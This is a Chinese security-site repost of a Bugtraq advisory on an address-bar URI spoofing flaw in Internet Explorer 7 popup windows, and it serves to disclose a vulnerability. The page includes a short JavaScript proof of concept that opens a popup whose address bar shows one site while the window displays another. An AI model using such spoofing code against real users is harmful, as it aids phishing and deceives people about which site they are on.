手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >IE7弹出窗口地址栏URI欺骗漏洞
IE7弹出窗口地址栏URI欺骗漏洞
摘要:受影响系统:MicrosoftInternetExplorer7.0描述:BUGTRAQID:28498InternetExplorer是微...

受影响系统:

Microsoft Internet Explorer 7.0 描述: BUGTRAQ ID: 28498 Internet Explorer是微软发布的非常流行的WEB浏览器。 如果用户用IE访问了恶意网页的话,则弹出窗口的地址栏可能为任意地址而窗口主题中为任意页面或内容。这有助于攻击者执行网络钓鱼攻击。 <*来源:Juan Pablo Lopez Yacubian (jplopezy@gmail.com) 链接:http://marc.info/?l=bugtraq&m=120673515616258&w=2 *> 测试方法: 警 告 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! <script language="JavaScript">

function iniciar()

{ nuevaventana = window.open("", "Win", "width=500,height=500,location=1"); nuevaventana.document.location = "http://www.google.com.ar/#" "www.microsoft.com/"; }

iniciar()

</script>

建议: 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.microsoft.com/windows/ie/default.asp

【IE7弹出窗口地址栏URI欺骗漏洞】相关文章:

Coppermine Photo Gallery跨站脚本及SQL注入漏洞

Oblog最新注入漏洞分析(已修补)

Gh0st控制端逻辑漏洞

IBM Tivoli Storage Manager Express 堆溢出漏洞

Cisco UCP CSuserCGI.exe缓冲溢出及跨站脚本漏洞

Symark PowerBroker 客户端多个本地命令溢出漏洞

解析PNG图象格式库存在远程拒绝服务漏洞

Novell GroupWise Windows API 邮件信息泄露漏洞

BitTorrent和uTorrent Peers 窗口缓冲区溢出漏洞

Microsoft IE onunload事件地址栏欺骗漏洞

精品推荐
分类导航